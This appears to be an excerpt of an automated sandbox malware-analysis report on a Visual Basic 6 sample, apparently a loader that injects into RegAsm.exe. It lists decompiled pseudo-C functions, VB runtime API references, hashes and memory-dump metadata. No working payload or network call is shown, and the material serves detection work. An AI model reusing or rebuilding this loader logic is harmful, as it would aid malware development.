0x00414e34
0x00414e3a
0x00414e42
0x00414e4b
0x00414e4d
0x00414e4f
0x00414e5a
0x00414e62
0x00414e68
0x00414e6e
0x00414e74
0x00414e7a
0x00414e7f
0x00414e86
0x00414e87
0x00414e8d
0x00414e93
0x00414e94
0x00414e99
0x00414e9a
0x00414e9f
0x00414ea5
0x00414ea6
0x00414eab
0x00414eac
0x00414eb3
0x00414ebe
0x00414ec5
0x00414ec6
0x00414ec7
0x00414edd
0x00414ee2
0x00414eea
0x00414ef0
0x00414ef6
0x00414ef8
0x00414efd
0x00414f02
0x00414f02
0x00414f07
0x00414f17
0x00414f1a
0x00414f1e
0x00414f20
0x00414f22
0x00414f27
0x00414f28
0x00414f29
0x00414f29
0x00414f2e
0x00414f3e
0x00414f40
0x00414f46
0x00414f4a
0x00414f4c
0x00414f51
0x00414f56
0x00414f57
0x00414f58
0x00414f58
0x00414f63
0x00414f68
0x00414f6e
0x00414f70
0x00414f75
0x00414f7a
0x00414f7a
0x00414f7f
0x00414f8f
0x00414f92
0x00414f96
0x00414f98
0x00414f9a
0x00414f9f
0x00414fa0
0x00414fa1
0x00414fa1
0x00414fa6
0x00414fb6
0x00414fb8
0x00414fbe
0x00414fc2
0x00414fc4
0x00414fc9
0x00414fce
0x00414fcf
0x00414fd0
0x00414fd0
0x00414fdb
0x00414fe0
0x00414feb
0x00414ff1
0x00414ff5
0x00414ff7
0x00414ffc
0x00415001
0x00415002
0x00415003
0x00415003
0x00414ff5
0x00415008
0x0041502c
0x00415031

APIs

__vbaStrCopy.MSVBVM60 ref: 00414E7A
__vbaRecUniToAnsi.MSVBVM60(0040D540,?,?,00000000), ref: 00414E94
__vbaStrToAnsi.MSVBVM60(?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EA6
__vbaSetSystemError.MSVBVM60(00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EB3
__vbaRecAnsiToUni.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EC7
__vbaFreeStr.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EE2
__vbaNew2.MSVBVM60(0040DA30,00416364,0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414F02
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000014), ref: 00414F29
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 00414F58
__vbaFreeObj.MSVBVM60 ref: 00414F63
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 00414F7A
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000014), ref: 00414FA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 00414FD0
__vbaFreeObj.MSVBVM60 ref: 00414FDB
__vbaHresultCheckObj.MSVBVM60(00000000,004013E0,0040D230,0000015C), ref: 00415003
__vbaFreeStr.MSVBVM60(00415032,0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 0041502C

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$Ansi$New2$CopyErrorSystem
String ID:
API String ID: 1472228644-0
Opcode ID: 4130ff6df4808c78dc73b1a5c044922298842ab7beea5b9cfe8be9eab6876e0d
Instruction ID: 8dde61886954f1ba9d13cf90cf58c9732770f97a13413e71496592f5bed2e878
Opcode Fuzzy Hash: 4130ff6df4808c78dc73b1a5c044922298842ab7beea5b9cfe8be9eab6876e0d
Instruction Fuzzy Hash: 8E516471A01214BBCB10EF65CC85EDA77B8AF49704F1044BAF50AB71D1DA78AB85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041464F, Relevance: 18.1, APIs: 12, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041464F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				char _v56;
				intOrPtr* _v68;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;
				intOrPtr* _t60;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t69;

				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_v12 = _t69 - 0x38;
				_v8 = 0x401388;
				_t32 =  *0x416010; // 0x4f00d8
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v56 = 0;
				if(_t32 != 0) {
					_t50 = 0x40de54;
				} else {
					_push(0x416010);
					_t50 = 0x40de54;
					_push(0x40de54);
					L0040155E();
					_t32 =  *0x416010; // 0x4f00d8
				}
				_push( *((intOrPtr*)( *_t32 + 0x378))(_t32));
				_t34 =  &_v36;
				_push(_t34);
				L0040154C();
				_t60 = _t34;
				_t35 =  *0x416010; // 0x4f00d8
				_v68 = _t60;
				_v44 = 0x80020004;
				_v52 = 0xa;
				if(_t35 == 0) {
					_push(0x416010);
					_push(_t50);
					L0040155E();
					_t35 =  *0x416010; // 0x4f00d8
				}
				_t37 =  &_v32;
				L0040154C();
				_t64 = _t37;
				_t39 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v28, _t37,  *((intOrPtr*)( *_t35 + 0x300))(_t35));
				asm("fclex");
				if(_t39 < 0) {
					_push(0x48);
					_push(0x40dc04);
					_push(_t64);
					_push(_t39);
					L00401558();
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t41 =  *((intOrPtr*)( *_t60 + 0x1ec))(_v68, _v28);
				asm("fclex");
				if(_t41 < 0) {
					_push(0x1ec);
					_push(0x40da50);
					_push(_v68);
					_push(_t41);
					L00401558();
				}
				L00401528();
				_push( &_v36);
				_push( &_v32);
				_push(2);
				L00401546();
				_t44 =  *0x416010; // 0x4f00d8
				if(_t44 == 0) {
					_push(0x416010);
					_push(_t50);
					L0040155E();
					_t44 =  *0x416010; // 0x4f00d8
				}
				_t46 =  &_v32;
				L0040154C();
				_t66 = _t46;
				_t48 =  *((intOrPtr*)( *_t66 + 0x80))(_t66,  &_v56, _t46,  *((intOrPtr*)( *_t44 + 0x394))(_t44));
				asm("fclex");
				if(_t48 < 0) {
					_push(0x80);
					_push(0x40dbf4);
					_push(_t66);
					_push(_t48);
					L00401558();
				}
				_v24 = _v56;
				L00401552();
				asm("wait");
				_push(E004147ED);
				return _t48;
			}

0x00414654
0x0041465f
0x00414660
0x0041466d
0x00414670
0x00414677
0x00414680
0x00414683
0x00414686
0x00414689
0x0041468c
0x004146a5
0x0041468e
0x0041468e
0x00414693
0x00414698
0x00414699
0x0041469e
0x0041469e
0x004146b3
0x004146b4
0x004146b7
0x004146b8
0x004146bd
0x004146bf
0x004146c6
0x004146c9
0x004146d0
0x004146d7
0x004146d9
0x004146de
0x004146df
0x004146e4
0x004146e4
0x004146f3
0x004146f7
0x004146ff
0x00414705
0x00414708
0x0041470c
0x0041470e
0x00414710
0x00414715
0x00414716
0x00414717
0x00414717
0x0041472c
0x0041472d
0x0041472e
0x0041472f
0x00414730
0x00414738
0x0041473a
0x0041473c
0x00414741
0x00414746
0x00414749
0x0041474a
0x0041474a
0x00414752
0x0041475a
0x0041475e
0x0041475f
0x00414761
0x00414766
0x00414770
0x00414772
0x00414777
0x00414778
0x0041477d
0x0041477d
0x0041478c
0x00414790
0x00414798
0x0041479e
0x004147a4
0x004147a8
0x004147aa
0x004147af
0x004147b4
0x004147b5
0x004147b6
0x004147b6
0x004147c1
0x004147c4
0x004147c9
0x004147ca
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00414699
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146B8
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000), ref: 004146DF
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146F7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DC04,00000048), ref: 00414717
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001EC), ref: 0041474A
__vbaFreeStr.MSVBVM60 ref: 00414752
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414761
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00414778
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414790
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBF4,00000080), ref: 004147B6
__vbaFreeObj.MSVBVM60 ref: 004147C4

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID:
API String ID: 2509323985-0
Opcode ID: b05eeb994426f6bea324882602be6421287ab77d7972e167bae0895f1c45ccc3
Instruction ID: 5745aa85450775d4e26770f8803a9de9100647a3b332e89c7cb4159715897730
Opcode Fuzzy Hash: b05eeb994426f6bea324882602be6421287ab77d7972e167bae0895f1c45ccc3
Instruction Fuzzy Hash: 98413170A00214ABDB10EF95CC49FEE7BBCEF49704F10442AF552BB191DB799945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414808, Relevance: 12.1, APIs: 8, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00414808(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v84;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr* _t62;
				void* _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;

				_t66 = _t65 - 0xc;
				 *[fs:0x0] = _t66;
				_t67 = _t66 - 0x4c;
				_v16 = _t67;
				_v12 = 0x4013a0;
				_v8 = 0;
				_t30 = _a4;
				 *((intOrPtr*)( *_t30 + 4))(_t30, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t63);
				_t32 =  *0x416010; // 0x4f00d8
				_v28 = 0;
				_v32 = 0;
				_v84 = 0;
				if(_t32 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t32 =  *0x416010; // 0x4f00d8
				}
				_t34 =  &_v32;
				L0040154C();
				_t45 = _t34;
				_t35 = 0xa;
				_v80 = _t35;
				_v72 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v64 = _t35;
				_v56 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v48 = _t35;
				_v40 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t67 - 0xfffffffffffffff0)) =  *0x401398;
				_t37 =  *((intOrPtr*)( *_t45 + 0x178))(_t45, 0x80020004, _t34,  *((intOrPtr*)( *_t32 + 0x31c))(_t32));
				asm("fclex");
				if(_t37 < 0) {
					_push(0x178);
					_push(0x40dbd4);
					_push(_t45);
					_push(_t37);
					L00401558();
				}
				L00401552();
				_t38 =  *0x416010; // 0x4f00d8
				if(_t38 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t38 =  *0x416010; // 0x4f00d8
				}
				_t40 =  &_v32;
				L0040154C();
				_t62 = _t40;
				_t42 =  *((intOrPtr*)( *_t62 + 0xb0))(_t62,  &_v84, _t40,  *((intOrPtr*)( *_t38 + 0x394))(_t38));
				asm("fclex");
				if(_t42 < 0) {
					_push(0xb0);
					_push(0x40dbf4);
					_push(_t62);
					_push(_t42);
					L00401558();
				}
				_t43 = _v84;
				_v28 = _t43;
				L00401552();
				asm("wait");
				_push(E00414960);
				return _t43;
			}

0x0041480b
0x0041481a
0x00414821
0x00414827
0x0041482a
0x00414833
0x00414836
0x0041483c
0x0041483f
0x00414846
0x00414849
0x0041484c
0x0041484f
0x00414851
0x00414856
0x0041485b
0x00414860
0x00414860
0x0041486f
0x00414873
0x00414880
0x00414882
0x0041488d
0x00414890
0x00414896
0x00414897
0x00414898
0x00414899
0x0041489d
0x004148a2
0x004148a8
0x004148a9
0x004148aa
0x004148ab
0x004148af
0x004148b4
0x004148bc
0x004148bd
0x004148be
0x004148c0
0x004148c1
0x004148c5
0x004148cd
0x004148cf
0x004148d1
0x004148d6
0x004148db
0x004148dc
0x004148dd
0x004148dd
0x004148e5
0x004148ea
0x004148f1
0x004148f3
0x004148f8
0x004148fd
0x00414902
0x00414902
0x00414911
0x00414915
0x0041491d
0x00414923
0x00414929
0x0041492d
0x0041492f
0x00414934
0x00414939
0x0041493a
0x0041493b
0x0041493b
0x00414940
0x00414946
0x00414949
0x0041494e
0x0041494f
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0041485B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414873
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBD4,00000178), ref: 004148DD
__vbaFreeObj.MSVBVM60 ref: 004148E5
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004148FD
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414915
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBF4,000000B0), ref: 0041493B
__vbaFreeObj.MSVBVM60 ref: 00414949

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: 24f967fbb86b7872246db838adff310dacac89c3a8d7784753ddca9c3a8d8c5f
Instruction ID: 70e809ebe6a838e3604b4f47ab4e33f29980c4aa0330dfeab0687ba9c13de547
Opcode Fuzzy Hash: 24f967fbb86b7872246db838adff310dacac89c3a8d7784753ddca9c3a8d8c5f
Instruction Fuzzy Hash: 3C414FB0E00204ABCB00EFA9C845ADF7BB8AF49704F10446AF856FB291D77899058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00414276, Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00414276(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _v48;
				intOrPtr* _t28;
				void* _t31;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t56;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				_v16 = _t54 - 0x34;
				_v12 = 0x401358;
				_v8 = 0;
				_t28 = _a4;
				 *((intOrPtr*)( *_t28 + 4))(_t28, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t51);
				_v28 = 0;
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				L004014AA();
				_t56 =  *0x416364; // 0x2bfe8d4
				if(_t56 == 0) {
					_push(0x416364);
					_push(0x40da30);
					L0040155E();
				}
				_t49 =  *0x416364; // 0x2bfe8d4
				_t31 =  *((intOrPtr*)( *_t49 + 0x14))(_t49,  &_v48);
				asm("fclex");
				if(_t31 < 0) {
					_push(0x14);
					_push(0x40da20);
					_push(_t49);
					_push(_t31);
					L00401558();
				}
				_t32 = _v48;
				_t50 = _t32;
				_t33 =  *((intOrPtr*)( *_t32 + 0xf0))(_t32,  &_v44);
				asm("fclex");
				if(_t33 < 0) {
					_push(0xf0);
					_push(0x40da40);
					_push(_t50);
					_push(_t33);
					L00401558();
				}
				_v44 = 0;
				L00401504();
				L00401552();
				_v36 = 0xa2697710;
				_v32 = 0x5af8;
				_push(E0041437B);
				L00401528();
				L00401528();
				return _t33;
			}

0x00414279
0x00414288
0x00414295
0x00414298
0x004142a1
0x004142a4
0x004142aa
0x004142b3
0x004142b6
0x004142b9
0x004142bc
0x004142bf
0x004142c2
0x004142c5
0x004142ca
0x004142d0
0x004142d2
0x004142d7
0x004142dc
0x004142dc
0x004142e1
0x004142ee
0x004142f1
0x004142f5
0x004142f7
0x004142f9
0x004142fe
0x004142ff
0x00414300
0x00414300
0x00414305
0x0041430f
0x00414311
0x00414317
0x0041431b
0x0041431d
0x00414322
0x00414327
0x00414328
0x00414329
0x00414329
0x00414334
0x00414337
0x0041433f
0x00414344
0x0041434b
0x00414352
0x0041436d
0x00414375
0x0041437a

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 004142C5
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 004142DC
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000014), ref: 00414300
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 00414329
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414337
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 0041433F
__vbaFreeStr.MSVBVM60(0041437B), ref: 0041436D
__vbaFreeStr.MSVBVM60(0041437B), ref: 00414375

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$CopyMoveNew2
String ID:
API String ID: 116834155-0
Opcode ID: 1f65c44ceff44b544526d7977db3fe383e395b4a8e58e498864ad9fa64425a42
Instruction ID: 5c5e7974bcc5d9572154f563ef020c6c26bdcc467250221397c27389d09463e2
Opcode Fuzzy Hash: 1f65c44ceff44b544526d7977db3fe383e395b4a8e58e498864ad9fa64425a42
Instruction Fuzzy Hash: E1212470D40209ABCB00EF96C946AEEBBB4FF99714F10406AE412772A1D7789545CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B52, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00414B52(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24, void* _a28) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _t20;
				intOrPtr* _t22;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr* _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				_v16 = _t44 - 0x1c;
				_v12 = 0x4013c0;
				_v8 = 0;
				_t20 = _a4;
				 *((intOrPtr*)( *_t20 + 4))(_t20, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t41);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				L004014AA();
				L004014AA();
				_t22 =  *0x416010; // 0x4f00d8
				if(_t22 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t22 =  *0x416010; // 0x4f00d8
				}
				_t24 =  &_v36;
				L0040154C();
				_t40 = _t24;
				_t26 =  *((intOrPtr*)( *_t40 + 0x1a8))(_t40, _t24,  *((intOrPtr*)( *_t22 + 0x370))(_t22));
				asm("fclex");
				if(_t26 < 0) {
					_push(0x1a8);
					_push(0x40da78);
					_push(_t40);
					_push(_t26);
					L00401558();
				}
				L00401552();
				_push(E00414C23);
				L00401528();
				L00401528();
				return _t26;
			}

0x00414b55
0x00414b64
0x00414b71
0x00414b74
0x00414b7d
0x00414b80
0x00414b86
0x00414b8f
0x00414b92
0x00414b95
0x00414b98
0x00414ba3
0x00414ba8
0x00414baf
0x00414bb1
0x00414bb6
0x00414bbb
0x00414bc0
0x00414bc0
0x00414bcf
0x00414bd3
0x00414bd8
0x00414bdd
0x00414be3
0x00414be7
0x00414be9
0x00414bee
0x00414bf3
0x00414bf4
0x00414bf5
0x00414bf5
0x00414bfd
0x00414c02
0x00414c15
0x00414c1d
0x00414c22

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414B98
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BA3
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BBB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BD3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA78,000001A8,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BF5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BFD
__vbaFreeStr.MSVBVM60(00414C23,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414C15
__vbaFreeStr.MSVBVM60(00414C23,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414C1D

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$Copy$CheckHresultNew2
String ID:
API String ID: 1874231197-0
Opcode ID: fde4b019575fe01bf2ab4270ccb542c93525dd41048d45adfc4a2eb51a9d193f
Instruction ID: 51800d8fba637dd745cd87c7f8b9eb506a03357ba0edb29b414d9ad3b754c26e
Opcode Fuzzy Hash: fde4b019575fe01bf2ab4270ccb542c93525dd41048d45adfc4a2eb51a9d193f
Instruction Fuzzy Hash: 9D211270940205ABCB00EFA5CC46EEEBBB8FF94704F10442AF446B71A1DB7C9546CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041456A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041456A(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _t15;
				intOrPtr* _t17;
				void* _t19;
				intOrPtr* _t21;
				intOrPtr _t31;

				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_v12 = _t31 - 0x28;
				_v8 = 0x401378;
				_t15 =  *0x416010; // 0x4f00d8
				_v32 = _v32 & 0x00000000;
				if(_t15 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t15 =  *0x416010; // 0x4f00d8
				}
				_t17 =  &_v32;
				L0040154C();
				_v40 = 0x80020004;
				_v48 = 0xa;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t21 = _t17;
				asm("movsd");
				_t19 =  *((intOrPtr*)( *_t21 + 0x1ec))(_t21, L"Busserviceanlgget7", _t17,  *((intOrPtr*)( *_t15 + 0x364))(_t15));
				asm("fclex");
				if(_t19 < 0) {
					_push(0x1ec);
					_push(0x40dc14);
					_push(_t21);
					_push(_t19);
					L00401558();
				}
				L00401552();
				_v28 = 0xd9e23180;
				_v24 = 0x5aff;
				_push(E0041462E);
				return _t19;
			}

0x0041456f
0x0041457a
0x0041457b
0x00414588
0x0041458b
0x00414592
0x00414597
0x0041459d
0x0041459f
0x004145a4
0x004145a9
0x004145ae
0x004145ae
0x004145bd
0x004145c1
0x004145cb
0x004145d2
0x004145dc
0x004145dd
0x004145de
0x004145df
0x004145e9
0x004145ea
0x004145f2
0x004145f4
0x004145f6
0x004145fb
0x00414600
0x00414601
0x00414602
0x00414602
0x0041460a
0x0041460f
0x00414616
0x0041461d
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004145A9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004145C1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DC14,000001EC), ref: 00414602
__vbaFreeObj.MSVBVM60 ref: 0041460A

Strings

Busserviceanlgget7, xrefs: 004145E3

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Busserviceanlgget7
API String ID: 1645334062-1059369656
Opcode ID: a747300bce16393301de8768629110e32db773eb70c1b2a51f1ca544af465d24
Instruction ID: c78a2d5b5caeaaa3be94bac5d1fe148632e6997c9e6fdd5a7960b38c7640c24c
Opcode Fuzzy Hash: a747300bce16393301de8768629110e32db773eb70c1b2a51f1ca544af465d24
Instruction Fuzzy Hash: 701133B1A00704BBDB00EF99CD46B9F7AB8EB49704F104069F501BB191D7BD99058B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 1280 Parent PID: 6888 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	28.5%
Dynamic/Decrypted Code Coverage:	98.4%
Signature Coverage:	8.1%
Total number of Nodes:	123
Total number of Limit Nodes:	7

Executed Functions

Function 1DB3247D, Relevance: 10.6, Strings: 6, Instructions: 3062COMMON

Download Yara Rule

Strings

PpqD, xrefs: 1DB32FF4
+rl, xrefs: 1DB333B1
tq04, xrefs: 1DB3284D
1'r<, xrefs: 1DB324AC
tqH., xrefs: 1DB32511
Atq, xrefs: 1DB32D9C

Memory Dump Source

Source File: 00000008.00000002.1730941488.000000001DB32000.00000040.00000001.sdmp, Offset: 1DB32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db32000_RegAsm.jbxd

Similarity

API ID:
String ID: +rl$1'r<$Atq$PpqD$tq04$tqH.
API String ID: 0-3400664796
Opcode ID: a87465bc7f113981ebf115a129689f55a8ceef8f45a848ed33942c5b33f449dc
Instruction ID: 3be19bd03315790c14501df820e042b9a16906fa3764cbfda2ca36636fe66669
Opcode Fuzzy Hash: a87465bc7f113981ebf115a129689f55a8ceef8f45a848ed33942c5b33f449dc
Instruction Fuzzy Hash: 74E2BC6690F7D16FC7434B3888A15927F71AE1361275E42CBC4C3CF2A3D51A984AE7A3

Uniqueness

Uniqueness Score: -1.00%

Function 01602888, Relevance: 1.7, APIs: 1, Instructions: 202
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

